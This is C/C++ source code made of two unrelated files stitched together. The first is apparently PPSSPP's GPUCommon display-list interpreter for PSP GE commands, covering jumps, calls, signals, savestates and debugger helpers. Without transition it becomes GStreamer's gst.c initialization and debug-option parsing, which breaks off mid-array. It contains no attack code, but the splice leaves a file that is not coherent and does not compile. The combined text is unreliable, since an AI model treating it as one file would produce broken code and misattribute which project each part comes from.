	for (int listIndex = GetNextListIndex(); listIndex != -1; listIndex = GetNextListIndex()) {
		DisplayList &l = dls[listIndex];
		DEBUG_LOG(G3D, "Starting DL execution at %08x - stall = %08x", l.pc, l.stall);
		if (!InterpretList(l)) {
			// The list yielded (paused/stalled/interrupted) - retry later.
			return;
		} else {
			easy_guard guard(listLock);
			// Some other list could've taken the spot while we dilly-dallied around.
			if (l.state != PSP_GE_DL_STATE_QUEUED) {
				// At the end, we can remove it from the queue and continue.
				dlQueue.erase(std::remove(dlQueue.begin(), dlQueue.end(), listIndex), dlQueue.end());
			}
			UpdateTickEstimate(std::max(busyTicks, startingTicks + cyclesExecuted));
		}
	}

	easy_guard guard(listLock);
	currentList = NULL;

	// Queue drained: record completion time and wake DrawSync waiters.
	drawCompleteTicks = startingTicks + cyclesExecuted;
	busyTicks = std::max(busyTicks, drawCompleteTicks);
	__GeTriggerSync(GPU_SYNC_DRAW, 1, drawCompleteTicks);
	// Since the event is in CoreTiming, we're in sync.  Just set 0 now.
	UpdateTickEstimate(0);
}
// Hook called before an op is latched into cmdmem; the base class does
// nothing - backends may override.
void GPUCommon::PreExecuteOp(u32 op, u32 diff) {
	// Nothing to do
}

// OFFSETADDR: sets the upper bits used when forming relative addresses.
void GPUCommon::Execute_OffsetAddr(u32 op, u32 diff) {
	gstate_c.offsetAddr = op << 8;
}

// ORIGIN: relative addresses become relative to the current list pc.
void GPUCommon::Execute_Origin(u32 op, u32 diff) {
	easy_guard guard(listLock);
	gstate_c.offsetAddr = currentList->pc;
}
// JUMP: unconditional branch within the display list.
void GPUCommon::Execute_Jump(u32 op, u32 diff) {
	easy_guard guard(listLock);
	const u32 target = gstate_c.getRelativeAddress(op & 0x00FFFFFC);
	if (Memory::IsValidAddress(target)) {
		UpdatePC(currentList->pc, target - 4);
		currentList->pc = target - 4; // pc will be increased after we return, counteract that
	} else {
		ERROR_LOG_REPORT(G3D, "JUMP to illegal address %08x - ignoring! data=%06x", target, op & 0x00FFFFFF);
	}
}

// BJUMP: branch taken only when the preceding bounding-box test failed.
// NOTE(review): bboxResult is read before listLock is taken - presumably
// only the run loop writes it, but worth confirming.
void GPUCommon::Execute_BJump(u32 op, u32 diff) {
	if (!currentList->bboxResult) {
		// bounding box jump.
		easy_guard guard(listLock);
		const u32 target = gstate_c.getRelativeAddress(op & 0x00FFFFFC);
		if (Memory::IsValidAddress(target)) {
			UpdatePC(currentList->pc, target - 4);
			currentList->pc = target - 4; // pc will be increased after we return, counteract that
		} else {
			ERROR_LOG_REPORT(G3D, "BJUMP to illegal address %08x - ignoring! data=%06x", target, op & 0x00FFFFFF);
		}
	}
}
// CALL: push a return address onto the list's call stack and branch. Calls
// that target a 12-word bone matrix upload take a dedicated fast path.
void GPUCommon::Execute_Call(u32 op, u32 diff) {
	easy_guard guard(listLock);

	// Saint Seiya needs correct support for relative calls.
	const u32 retval = currentList->pc + 4;
	const u32 target = gstate_c.getRelativeAddress(op & 0x00FFFFFC);
	if (!Memory::IsValidAddress(target)) {
		ERROR_LOG_REPORT(G3D, "CALL to illegal address %08x - ignoring! data=%06x", target, op & 0x00FFFFFF);
		return;
	}

	// Bone matrix optimization - many games will CALL a bone matrix (!).
	if ((Memory::ReadUnchecked_U32(target) >> 24) == GE_CMD_BONEMATRIXDATA) {
		// Check for the end
		if ((Memory::ReadUnchecked_U32(target + 11 * 4) >> 24) == GE_CMD_BONEMATRIXDATA &&
			(Memory::ReadUnchecked_U32(target + 12 * 4) >> 24) == GE_CMD_RET) {
			// Yep, pretty sure this is a bone matrix call.
			FastLoadBoneMatrix(target);
			return;
		}
	}

	if (currentList->stackptr == ARRAY_SIZE(currentList->stack)) {
		ERROR_LOG_REPORT(G3D, "CALL: Stack full!");
	} else {
		auto &stackEntry = currentList->stack[currentList->stackptr++];
		stackEntry.pc = retval;
		stackEntry.offsetAddr = gstate_c.offsetAddr;
		// The base address is NOT saved/restored for a regular call.
		UpdatePC(currentList->pc, target - 4);
		currentList->pc = target - 4;	// pc will be increased after we return, counteract that
	}
}
// RET: pop the call stack and resume after the matching CALL. Restores
// offsetAddr (but not base, matching CALL which doesn't save it).
void GPUCommon::Execute_Ret(u32 op, u32 diff) {
	easy_guard guard(listLock);
	if (currentList->stackptr == 0) {
		DEBUG_LOG_REPORT(G3D, "RET: Stack empty!");
	} else {
		auto &stackEntry = currentList->stack[--currentList->stackptr];
		gstate_c.offsetAddr = stackEntry.offsetAddr;
		// We always clear the top (uncached/etc.) bits
		const u32 target = stackEntry.pc & 0x0FFFFFFF;
		UpdatePC(currentList->pc, target - 4);
		currentList->pc = target - 4;
		if (!Memory::IsValidAddress(currentList->pc)) {
			ERROR_LOG_REPORT(G3D, "Invalid DL PC %08x on return", currentList->pc);
			UpdateState(GPUSTATE_ERROR);
		}
	}
}
// END: completes the effect of the immediately preceding SIGNAL or FINISH
// command (read back from pc - 4). For SIGNAL, the behavior byte selects
// suspend/continue/pause/sync semantics or a list-relative jump/call/ret;
// for FINISH, the list completes (or pauses, depending on its signal).
void GPUCommon::Execute_End(u32 op, u32 diff) {
	easy_guard guard(listLock);
	const u32 prev = Memory::ReadUnchecked_U32(currentList->pc - 4);
	UpdatePC(currentList->pc);
	// Count in a few extra cycles on END.
	cyclesExecuted += 60;

	switch (prev >> 24) {
	case GE_CMD_SIGNAL:
		{
			// TODO: see http://code.google.com/p/jpcsp/source/detail?r=2935#
			// Behavior byte lives in SIGNAL bits 16-23; the 16-bit payloads come
			// from SIGNAL (signal) and END (enddata).
			SignalBehavior behaviour = static_cast<SignalBehavior>((prev >> 16) & 0xFF);
			const int signal = prev & 0xFFFF;
			const int enddata = op & 0xFFFF;
			// trigger controls whether a GE interrupt is raised below.
			bool trigger = true;
			currentList->subIntrToken = signal;

			switch (behaviour) {
			case PSP_GE_SIGNAL_HANDLER_SUSPEND:
				// Suspend the list, and call the signal handler. When it's done, resume.
				// Before sdkver 0x02000010, listsync should return paused.
				if (sceKernelGetCompiledSdkVersion() <= 0x02000010)
					currentList->state = PSP_GE_DL_STATE_PAUSED;
				currentList->signal = behaviour;
				DEBUG_LOG(G3D, "Signal with wait. signal/end: %04x %04x", signal, enddata);
				break;

			case PSP_GE_SIGNAL_HANDLER_CONTINUE:
				// Resume the list right away, then call the handler.
				currentList->signal = behaviour;
				DEBUG_LOG(G3D, "Signal without wait. signal/end: %04x %04x", signal, enddata);
				break;

			case PSP_GE_SIGNAL_HANDLER_PAUSE:
				// Pause the list instead of ending at the next FINISH.
				// Call the handler with the PAUSE signal value at that FINISH.
				// Technically, this ought to trigger an interrupt, but it won't do anything.
				// But right now, signal is always reset by interrupts, so that causes pause to not work.
				trigger = false;
				currentList->signal = behaviour;
				DEBUG_LOG(G3D, "Signal with Pause. signal/end: %04x %04x", signal, enddata);
				break;

			case PSP_GE_SIGNAL_SYNC:
				// Acts as a memory barrier, never calls any user code.
				// Technically, this ought to trigger an interrupt, but it won't do anything.
				// Triggering here can cause incorrect rescheduling, which breaks 3rd Birthday.
				// However, this is likely a bug in how GE signal interrupts are handled.
				trigger = false;
				currentList->signal = behaviour;
				DEBUG_LOG(G3D, "Signal with Sync. signal/end: %04x %04x", signal, enddata);
				break;

			case PSP_GE_SIGNAL_JUMP:
				{
					trigger = false;
					currentList->signal = behaviour;
					// pc will be increased after we return, counteract that.
					u32 target = ((signal << 16) | enddata) - 4;
					if (!Memory::IsValidAddress(target)) {
						ERROR_LOG_REPORT(G3D, "Signal with Jump: bad address. signal/end: %04x %04x", signal, enddata);
					} else {
						UpdatePC(currentList->pc, target);
						currentList->pc = target;
						DEBUG_LOG(G3D, "Signal with Jump. signal/end: %04x %04x", signal, enddata);
					}
				}
				break;

			case PSP_GE_SIGNAL_CALL:
				{
					trigger = false;
					currentList->signal = behaviour;
					// pc will be increased after we return, counteract that.
					u32 target = ((signal << 16) | enddata) - 4;
					if (currentList->stackptr == ARRAY_SIZE(currentList->stack)) {
						ERROR_LOG_REPORT(G3D, "Signal with Call: stack full. signal/end: %04x %04x", signal, enddata);
					} else if (!Memory::IsValidAddress(target)) {
						ERROR_LOG_REPORT(G3D, "Signal with Call: bad address. signal/end: %04x %04x", signal, enddata);
					} else {
						// TODO: This might save/restore other state...
						// Unlike a regular CALL, this saves the base address too.
						auto &stackEntry = currentList->stack[currentList->stackptr++];
						stackEntry.pc = currentList->pc;
						stackEntry.offsetAddr = gstate_c.offsetAddr;
						stackEntry.baseAddr = gstate.base;
						UpdatePC(currentList->pc, target);
						currentList->pc = target;
						DEBUG_LOG(G3D, "Signal with Call. signal/end: %04x %04x", signal, enddata);
					}
				}
				break;

			case PSP_GE_SIGNAL_RET:
				{
					trigger = false;
					currentList->signal = behaviour;
					if (currentList->stackptr == 0) {
						ERROR_LOG_REPORT(G3D, "Signal with Return: stack empty. signal/end: %04x %04x", signal, enddata);
					} else {
						// TODO: This might save/restore other state...
						// Restores base as well, matching PSP_GE_SIGNAL_CALL above.
						auto &stackEntry = currentList->stack[--currentList->stackptr];
						gstate_c.offsetAddr = stackEntry.offsetAddr;
						gstate.base = stackEntry.baseAddr;
						UpdatePC(currentList->pc, stackEntry.pc);
						currentList->pc = stackEntry.pc;
						DEBUG_LOG(G3D, "Signal with Return. signal/end: %04x %04x", signal, enddata);
					}
				}
				break;

			default:
				ERROR_LOG_REPORT(G3D, "UNKNOWN Signal UNIMPLEMENTED %i ! signal/end: %04x %04x", behaviour, signal, enddata);
				break;
			}
			// TODO: Technically, jump/call/ret should generate an interrupt, but before the pc change maybe?
			if (currentList->interruptsEnabled && trigger) {
				if (__GeTriggerInterrupt(currentList->id, currentList->pc, startingTicks + cyclesExecuted)) {
					currentList->pendingInterrupt = true;
					UpdateState(GPUSTATE_INTERRUPT);
				}
			}
		}
		break;

	case GE_CMD_FINISH:
		switch (currentList->signal) {
		case PSP_GE_SIGNAL_HANDLER_PAUSE:
			// A prior SIGNAL/PAUSE deferred the pause until this FINISH.
			currentList->state = PSP_GE_DL_STATE_PAUSED;
			if (currentList->interruptsEnabled) {
				if (__GeTriggerInterrupt(currentList->id, currentList->pc, startingTicks + cyclesExecuted)) {
					currentList->pendingInterrupt = true;
					UpdateState(GPUSTATE_INTERRUPT);
				}
			}
			break;

		case PSP_GE_SIGNAL_SYNC:
			currentList->signal = PSP_GE_SIGNAL_NONE;
			// TODO: Technically this should still cause an interrupt. Probably for memory sync.
			break;

		default:
			// Normal completion: mark done, fire the list interrupt if enabled,
			// otherwise complete immediately and restore the saved GE context.
			currentList->subIntrToken = prev & 0xFFFF;
			UpdateState(GPUSTATE_DONE);
			if (currentList->interruptsEnabled && __GeTriggerInterrupt(currentList->id, currentList->pc, startingTicks + cyclesExecuted)) {
				currentList->pendingInterrupt = true;
			} else {
				currentList->state = PSP_GE_DL_STATE_COMPLETED;
				currentList->waitTicks = startingTicks + cyclesExecuted;
				busyTicks = std::max(busyTicks, currentList->waitTicks);
				__GeTriggerSync(GPU_SYNC_LIST, currentList->id, currentList->waitTicks);
				if (currentList->started && currentList->context.IsValid()) {
					gstate.Restore(currentList->context);
					ReapplyGfxStateInternal();
				}
			}
			break;
		}
		break;

	default:
		DEBUG_LOG(G3D,"Ah, not finished: %06x", prev & 0xFFFFFF);
		break;
	}
}
// Dispatcher for the control-flow commands handled by the common core.
// Drawing and state commands are handled by backend subclasses before or
// instead of reaching this default implementation.
void GPUCommon::ExecuteOp(u32 op, u32 diff) {
	const u32 cmd = op >> 24;

	// Handle control and drawing commands here directly. The others we delegate.
	switch (cmd) {
	case GE_CMD_NOP:
		break;

	case GE_CMD_OFFSETADDR:
		Execute_OffsetAddr(op, diff);
		break;

	case GE_CMD_ORIGIN:
		Execute_Origin(op, diff);
		break;

	case GE_CMD_JUMP:
		Execute_Jump(op, diff);
		break;

	case GE_CMD_BJUMP:
		Execute_BJump(op, diff);
		break;

	case GE_CMD_CALL:
		Execute_Call(op, diff);
		break;

	case GE_CMD_RET:
		Execute_Ret(op, diff);
		break;

	case GE_CMD_SIGNAL:
	case GE_CMD_FINISH:
		// Processed in GE_END.
		break;

	case GE_CMD_END:
		Execute_End(op, diff);
		break;

	default:
		DEBUG_LOG(G3D,"DL Unknown: %08x @ %08x", op, currentList == NULL ? 0 : currentList->pc);
		break;
	}
}
// Fast path for a CALL that targets a 12-word bone matrix upload (detected
// in Execute_Call); delegates to the gstate helper.
void GPUCommon::FastLoadBoneMatrix(u32 target) {
	gstate.FastLoadBoneMatrix(target);
}
// Frozen layouts of older savestate versions of DisplayList, used only by
// DoState() to migrate old states. Field order and sizes must never change.
// v1 stored the context as a raw host pointer (size_t).
struct DisplayList_v1 {
	int id;
	u32 startpc;
	u32 pc;
	u32 stall;
	DisplayListState state;
	SignalBehavior signal;
	int subIntrBase;
	u16 subIntrToken;
	DisplayListStackEntry stack[32];
	int stackptr;
	bool interrupted;
	u64 waitTicks;
	bool interruptsEnabled;
	bool pendingInterrupt;
	bool started;
	size_t contextPtr;
	u32 offsetAddr;
	bool bboxResult;
};

// v2 replaced the raw pointer with a PSPPointer, but predates stackAddr.
struct DisplayList_v2 {
	int id;
	u32 startpc;
	u32 pc;
	u32 stall;
	DisplayListState state;
	SignalBehavior signal;
	int subIntrBase;
	u16 subIntrToken;
	DisplayListStackEntry stack[32];
	int stackptr;
	bool interrupted;
	u64 waitTicks;
	bool interruptsEnabled;
	bool pendingInterrupt;
	bool started;
	PSPPointer<u32_le> context;
	u32 offsetAddr;
	bool bboxResult;
};
// Savestate serialization for the common GPU state. Handles migration from
// the two older DisplayList layouts (sections 1 and 2).
void GPUCommon::DoState(PointerWrap &p) {
	easy_guard guard(listLock);

	auto s = p.Section("GPUCommon", 1, 3);
	if (!s)
		return;

	p.Do<int>(dlQueue);
	if (s >= 3) {
		p.DoArray(dls, ARRAY_SIZE(dls));
	} else if (s >= 2) {
		for (size_t i = 0; i < ARRAY_SIZE(dls); ++i) {
			DisplayList_v2 oldDL;
			p.Do(oldDL);
			// Copy over everything except the last, new member (stackAddr.)
			memcpy(&dls[i], &oldDL, sizeof(DisplayList_v2));
			dls[i].stackAddr = 0;
		}
	} else {
		// Can only be in read mode here.
		for (size_t i = 0; i < ARRAY_SIZE(dls); ++i) {
			DisplayList_v1 oldDL;
			p.Do(oldDL);
			// On 32-bit, they're the same, on 64-bit oldDL is bigger.
			memcpy(&dls[i], &oldDL, sizeof(DisplayList));
			// Fix the other fields. Let's hope context wasn't important, it was a pointer.
			dls[i].context = 0;
			dls[i].offsetAddr = oldDL.offsetAddr;
			dls[i].bboxResult = oldDL.bboxResult;
			dls[i].stackAddr = 0;
		}
	}
	int currentID = 0;
	if (currentList != NULL) {
		// Pointer subtraction between DisplayList* already yields an element
		// index. The old code divided by sizeof(DisplayList) again, which
		// collapsed nearly every index to 0 and lost the current list on save.
		currentID = (int)(currentList - &dls[0]);
	}
	p.Do(currentID);
	if (currentID == 0) {
		// Index 0 doubles as "no current list" - a pre-existing quirk kept
		// for savestate compatibility.
		currentList = NULL;
	} else {
		currentList = &dls[currentID];
	}
	p.Do(interruptRunning);
	p.Do(gpuState);
	p.Do(isbreak);
	p.Do(drawCompleteTicks);
	p.Do(busyTicks);
}
// Marks the start of a GE interrupt handler; list processing is held off
// while this flag is set.
void GPUCommon::InterruptStart(int listid) {
	interruptRunning = true;
}

// Called when a GE interrupt handler finishes: clears interrupt/break
// state, and if the list ended, restores its saved context and wakes
// ListSync waiters, then resumes queue processing.
void GPUCommon::InterruptEnd(int listid) {
	easy_guard guard(listLock);
	interruptRunning = false;
	isbreak = false;

	DisplayList &dl = dls[listid];
	dl.pendingInterrupt = false;
	// TODO: Unless the signal handler could change it?
	if (dl.state == PSP_GE_DL_STATE_COMPLETED || dl.state == PSP_GE_DL_STATE_NONE) {
		if (dl.started && dl.context.IsValid()) {
			gstate.Restore(dl.context);
			ReapplyGfxState();
		}
		dl.waitTicks = 0;
		__GeTriggerWait(GPU_SYNC_LIST, listid);
	}

	// Drop the lock before kicking the queue.
	guard.unlock();
	ProcessDLQueue();
}
// TODO: Maybe cleaner to keep this in GE and trigger the clear directly?
// Called when a GE sync wait completes. If a DRAWSYNC wait actually woke
// threads, recycle every completed list so its slot becomes available.
void GPUCommon::SyncEnd(GPUSyncType waitType, int listid, bool wokeThreads) {
	easy_guard guard(listLock);
	if (waitType != GPU_SYNC_DRAW || !wokeThreads)
		return;

	for (int i = 0; i < DisplayListMaxCount; ++i) {
		DisplayList &dl = dls[i];
		if (dl.state == PSP_GE_DL_STATE_COMPLETED)
			dl.state = PSP_GE_DL_STATE_NONE;
	}
}
// Copies out the currently executing display list; returns false if none.
bool GPUCommon::GetCurrentDisplayList(DisplayList &list) {
	easy_guard guard(listLock);
	if (currentList == NULL)
		return false;
	list = *currentList;
	return true;
}

// Snapshots every list currently sitting in the queue, in queue order.
std::vector<DisplayList> GPUCommon::ActiveDisplayLists() {
	easy_guard guard(listLock);
	std::vector<DisplayList> result;
	result.reserve(dlQueue.size());
	for (auto it = dlQueue.begin(), end = dlQueue.end(); it != end; ++it)
		result.push_back(dls[*it]);
	return result;
}
// Debugger helpers: force a list's pc / stall / state by ID. Each one
// validates the ID and asserts (debug builds) when it is out of range.
void GPUCommon::ResetListPC(int listID, u32 pc) {
	if (listID >= 0 && listID < DisplayListMaxCount) {
		easy_guard guard(listLock);
		dls[listID].pc = pc;
	} else {
		_dbg_assert_msg_(G3D, false, "listID out of range: %d", listID);
	}
}

void GPUCommon::ResetListStall(int listID, u32 stall) {
	if (listID >= 0 && listID < DisplayListMaxCount) {
		easy_guard guard(listLock);
		dls[listID].stall = stall;
	} else {
		_dbg_assert_msg_(G3D, false, "listID out of range: %d", listID);
	}
}

void GPUCommon::ResetListState(int listID, DisplayListState state) {
	if (listID >= 0 && listID < DisplayListMaxCount) {
		easy_guard guard(listLock);
		dls[listID].state = state;
	} else {
		_dbg_assert_msg_(G3D, false, "listID out of range: %d", listID);
	}
}
// Disassembles a single GE opcode at pc into a GPUDebugOp record.
GPUDebugOp GPUCommon::DissassembleOp(u32 pc, u32 op) {
	char desc[1024];
	GeDisassembleOp(pc, op, Memory::Read_U32(pc - 4), desc, sizeof(desc));

	GPUDebugOp result;
	result.pc = pc;
	result.cmd = op >> 24;
	result.op = op;
	result.desc = desc;
	return result;
}

// Disassembles [startpc, endpc) into a list of GPUDebugOp records, reading
// memory defensively so invalid addresses just produce zero ops.
std::vector<GPUDebugOp> GPUCommon::DissassembleOpRange(u32 startpc, u32 endpc) {
	std::vector<GPUDebugOp> ops;
	char desc[1024];

	// Don't trigger a pause.
	u32 previousOp = Memory::IsValidAddress(startpc - 4) ? Memory::Read_U32(startpc - 4) : 0;
	for (u32 addr = startpc; addr < endpc; addr += 4) {
		const u32 word = Memory::IsValidAddress(addr) ? Memory::Read_U32(addr) : 0;
		GeDisassembleOp(addr, word, previousOp, desc, sizeof(desc));
		previousOp = word;

		GPUDebugOp entry;
		entry.pc = addr;
		entry.cmd = word >> 24;
		entry.op = word;
		entry.desc = desc;
		ops.push_back(entry);
	}

	return ops;
}
u32 GPUCommon::GetRelativeAddress(u32 data) {
return gstate_c.getRelativeAddress(data);
}
u32 GPUCommon::GetVertexAddress() {
return gstate_c.vertexAddr;
}
u32 GPUCommon::GetIndexAddress() {
return gstate_c.indexAddr;
}
GPUgstate GPUCommon::GetGState() {
return gstate;
}
// Write a raw GE command word into the state: runs PreExecuteOp, stores the
// word in cmdmem, then ExecuteOp — the same sequence as normal command
// processing, so side effects of the command are applied.
void GPUCommon::SetCmdValue(u32 op) {
	u32 cmd = op >> 24;  // top byte selects the command register
	u32 diff = op ^ gstate.cmdmem[cmd];  // bits that differ from current value
	PreExecuteOp(op, diff);
	gstate.cmdmem[cmd] = op;
	ExecuteOp(op, diff);
}
/* GStreamer
* Copyright (C) 1999,2000 Erik Walthinsen <omega@cse.ogi.edu>
* 2000 Wim Taymans <wtay@chello.be>
*
* gst.c: Initialization and non-pipeline operations
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Library General Public
* License as published by the Free Software Foundation; either
* version 2 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Library General Public License for more details.
*
* You should have received a copy of the GNU Library General Public
* License along with this library; if not, write to the
* Free Software Foundation, Inc., 59 Temple Place - Suite 330,
* Boston, MA 02111-1307, USA.
*/
/**
* SECTION:gst
* @short_description: Media library supporting arbitrary formats and filter
* graphs.
*
* GStreamer is a framework for constructing graphs of various filters
 * (termed elements here) that will handle streaming media. Any discrete
* (packetizable) media type is supported, with provisions for automatically
* determining source type. Formatting/framing information is provided with
* a powerful negotiation framework. Plugins are heavily used to provide for
* all elements, allowing one to construct plugins outside of the GST
 * library, even released binary-only if the license requires it (please don't).
* GStreamer covers a wide range of use cases including: playback, recording,
* editing, serving streams, voice over ip and video calls.
*
* The <application>GStreamer</application> library should be initialized with
* gst_init() before it can be used. You should pass pointers to the main argc
* and argv variables so that GStreamer can process its own command line
* options, as shown in the following example.
*
* <example>
* <title>Initializing the gstreamer library</title>
* <programlisting language="c">
* int
* main (int argc, char *argv[])
* {
* // initialize the GStreamer library
* gst_init (&argc, &argv);
* ...
* }
* </programlisting>
* </example>
*
* It's allowed to pass two NULL pointers to gst_init() in case you don't want
* to pass the command line args to GStreamer.
*
* You can also use GOption to initialize your own parameters as shown in
* the next code fragment:
* <example>
* <title>Initializing own parameters when initializing gstreamer</title>
* <programlisting>
* static gboolean stats = FALSE;
* ...
* int
* main (int argc, char *argv[])
* {
* GOptionEntry options[] = {
* {"tags", 't', 0, G_OPTION_ARG_NONE, &tags,
* N_("Output tags (also known as metadata)"), NULL},
* {NULL}
* };
 * // must initialise the threading system before using any other GLib function
* if (!g_thread_supported ())
* g_thread_init (NULL);
* ctx = g_option_context_new ("[ADDITIONAL ARGUMENTS]");
* g_option_context_add_main_entries (ctx, options, GETTEXT_PACKAGE);
* g_option_context_add_group (ctx, gst_init_get_option_group ());
* if (!g_option_context_parse (ctx, &argc, &argv, &err)) {
* g_print ("Error initializing: %s\n", GST_STR_NULL (err->message));
* exit (1);
* }
* g_option_context_free (ctx);
* ...
* }
* </programlisting>
* </example>
*
* Use gst_version() to query the library version at runtime or use the
* GST_VERSION_* macros to find the version at compile time. Optionally
* gst_version_string() returns a printable string.
*
* The gst_deinit() call is used to clean up all internal resources used
* by <application>GStreamer</application>. It is mostly used in unit tests
* to check for leaks.
*
* Last reviewed on 2006-08-11 (0.10.10)
*/
#include "gst_private.h"
#include "gstconfig.h"
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#ifdef HAVE_SYS_UTSNAME_H
#include <sys/utsname.h>
#endif
#ifdef HAVE_UNISTD_H
#include <unistd.h>
#endif
#ifdef G_OS_WIN32
#define WIN32_LEAN_AND_MEAN /* prevents from including too many things */
#include <windows.h> /* GetStdHandle, windows console */
#endif
#if defined(GSTREAMER_LITE)
#include "gstplugins-lite.h"
#endif // GSTREAMER_LITE
#include "gst-i18n-lib.h"
#include <locale.h> /* for LC_ALL */
#include "gst.h"
#define GST_CAT_DEFAULT GST_CAT_GST_INIT

/* maximum number of tokens g_strsplit() produces per round in
 * split_and_iterate() */
#define MAX_PATH_SPLIT 16
#define GST_PLUGIN_SEPARATOR ","

/* set once gst_init()/gst_init_check() has completed */
static gboolean gst_initialized = FALSE;
/* set once gst_deinit() has run */
static gboolean gst_deinitialized = FALSE;

#ifdef G_OS_WIN32
/* handle of the GStreamer DLL, captured in DllMain() */
HMODULE _priv_gst_dll_handle = NULL;
#endif

#ifndef GST_DISABLE_REGISTRY
GList *_priv_gst_plugin_paths = NULL;   /* for delayed processing in post_init */

extern gboolean _priv_gst_disable_registry_update;
#endif

#ifndef GST_DISABLE_GST_DEBUG
extern const gchar *priv_gst_dump_dot_dir;
#endif

/* defaults */

/* set to TRUE when segfaults need to be left as is */
static gboolean _gst_disable_segtrap = FALSE;

/* pre/post parse hooks of the GStreamer option group, see
 * gst_init_get_option_group() */
static gboolean init_pre (GOptionContext * context, GOptionGroup * group,
    gpointer data, GError ** error);
static gboolean init_post (GOptionContext * context, GOptionGroup * group,
    gpointer data, GError ** error);

#ifndef GST_DISABLE_OPTION_PARSING
static gboolean parse_goption_arg (const gchar * s_opt,
    const gchar * arg, gpointer data, GError ** err);
#endif

/* plugin names collected from --gst-plugin-load (see parse_one_option()) */
GSList *_priv_gst_preload_plugins = NULL;

const gchar g_log_domain_gstreamer[] = "GStreamer";
/* GLog handler installed for the "GStreamer" domain in init_post();
 * simply forwards everything to GLib's default handler. */
static void
debug_log_handler (const gchar * log_domain,
    GLogLevelFlags log_level, const gchar * message, gpointer user_data)
{
  g_log_default_handler (log_domain, log_level, message, user_data);
  /* FIXME: do we still need this ? fatal errors these days are all
   * other than core errors */
  /* g_on_error_query (NULL); */
}
/* Identifiers for the command-line options handled by parse_one_option();
 * the lookup table in parse_goption_arg() maps option strings to these. */
enum
{
  ARG_VERSION = 1,
  ARG_FATAL_WARNINGS,
#ifndef GST_DISABLE_GST_DEBUG
  ARG_DEBUG_LEVEL,
  ARG_DEBUG,
  ARG_DEBUG_DISABLE,
  ARG_DEBUG_NO_COLOR,
  ARG_DEBUG_HELP,
#endif
  ARG_PLUGIN_SPEW,
  ARG_PLUGIN_PATH,
  ARG_PLUGIN_LOAD,
  ARG_SEGTRAP_DISABLE,
  ARG_REGISTRY_UPDATE_DISABLE,
  ARG_REGISTRY_FORK_DISABLE
};
/* debug-spec ::= category-spec [, category-spec]*
* category-spec ::= category:val | val
* category ::= [^:]+
* val ::= [0-5]
*/
#ifndef NUL
#define NUL '\0'
#endif
#ifndef GST_DISABLE_GST_DEBUG
/* Strip whitespace from @str (in place) and, if anything remains, point
 * *@category at it. Returns TRUE when a non-empty category name was found. */
static gboolean
parse_debug_category (gchar * str, const gchar ** category)
{
  if (str == NULL)
    return FALSE;

  /* works in place */
  g_strstrip (str);

  if (str[0] == NUL)
    return FALSE;

  *category = str;
  return TRUE;
}
/* Parse a single debug level digit ('0' .. GST_LEVEL_COUNT - 1) from @str
 * after stripping whitespace in place. Returns TRUE and stores the level
 * in *@level on success. */
static gboolean
parse_debug_level (gchar * str, gint * level)
{
  gchar digit;

  if (str == NULL)
    return FALSE;

  /* works in place */
  g_strstrip (str);

  digit = str[0];
  /* must be exactly one character long */
  if (digit == NUL || str[1] != NUL)
    return FALSE;
  /* and that character must be a valid level digit */
  if (digit < '0' || digit >= '0' + GST_LEVEL_COUNT)
    return FALSE;

  *level = digit - '0';
  return TRUE;
}
/* Parse a GST_DEBUG-style spec: a comma-separated list where each entry is
 * either "category:level" or a bare default "level" (see grammar above). */
static void
parse_debug_list (const gchar * list)
{
  gchar **entries, **entry;

  g_assert (list);

  entries = g_strsplit (list, ",", 0);
  for (entry = entries; *entry != NULL; entry++) {
    gint level;

    if (strchr (*entry, ':') == NULL) {
      /* bare level: becomes the default threshold for all categories */
      if (parse_debug_level (*entry, &level))
        gst_debug_set_default_threshold (level);
      continue;
    }

    /* "category:level" pair */
    {
      gchar **pair = g_strsplit (*entry, ":", 2);
      const gchar *category;

      if (pair[0] && pair[1]
          && parse_debug_category (pair[0], &category)
          && parse_debug_level (pair[1], &level))
        gst_debug_set_threshold_for_name (category, level);

      g_strfreev (pair);
    }
  }
  g_strfreev (entries);
}
#endif
#ifndef GSTREAMER_LITE
#ifdef G_OS_WIN32
BOOL WINAPI DllMain (HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved);
/* Windows DLL entry point: on process attach, record our own module handle
 * in _priv_gst_dll_handle. */
BOOL WINAPI
DllMain (HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
  if (fdwReason == DLL_PROCESS_ATTACH)
    _priv_gst_dll_handle = (HMODULE) hinstDLL;
  return TRUE;
}
#endif
#endif // GSTREAMER_LITE
/**
* gst_init_get_option_group:
*
* Returns a #GOptionGroup with GStreamer's argument specifications. The
* group is set up to use standard GOption callbacks, so when using this
* group in combination with GOption parsing methods, all argument parsing
* and initialization is automated.
*
* This function is useful if you want to integrate GStreamer with other
* libraries that use GOption (see g_option_context_add_group() ).
*
* If you use this function, you should make sure you initialise the GLib
* threading system as one of the very first things in your program
* (see the example at the beginning of this section).
*
* Returns: (transfer full): a pointer to GStreamer's option group.
*/
GOptionGroup *
gst_init_get_option_group (void)
{
#ifndef GST_DISABLE_OPTION_PARSING
  GOptionGroup *group;
  /* every option is routed through parse_goption_arg(), which maps the
   * option string to an ARG_* id and dispatches to parse_one_option() */
  static const GOptionEntry gst_args[] = {
    {"gst-version", 0, G_OPTION_FLAG_NO_ARG, G_OPTION_ARG_CALLBACK,
        (gpointer) parse_goption_arg, N_("Print the GStreamer version"), NULL},
    {"gst-fatal-warnings", 0, G_OPTION_FLAG_NO_ARG, G_OPTION_ARG_CALLBACK,
        (gpointer) parse_goption_arg, N_("Make all warnings fatal"), NULL},
#ifndef GST_DISABLE_GST_DEBUG
    {"gst-debug-help", 0, G_OPTION_FLAG_NO_ARG, G_OPTION_ARG_CALLBACK,
          (gpointer) parse_goption_arg,
          N_("Print available debug categories and exit"),
        NULL},
    {"gst-debug-level", 0, 0, G_OPTION_ARG_CALLBACK,
          (gpointer) parse_goption_arg,
          N_("Default debug level from 1 (only error) to 5 (anything) or "
              "0 for no output"),
        N_("LEVEL")},
    {"gst-debug", 0, 0, G_OPTION_ARG_CALLBACK, (gpointer) parse_goption_arg,
          N_("Comma-separated list of category_name:level pairs to set "
              "specific levels for the individual categories. Example: "
              "GST_AUTOPLUG:5,GST_ELEMENT_*:3"),
        N_("LIST")},
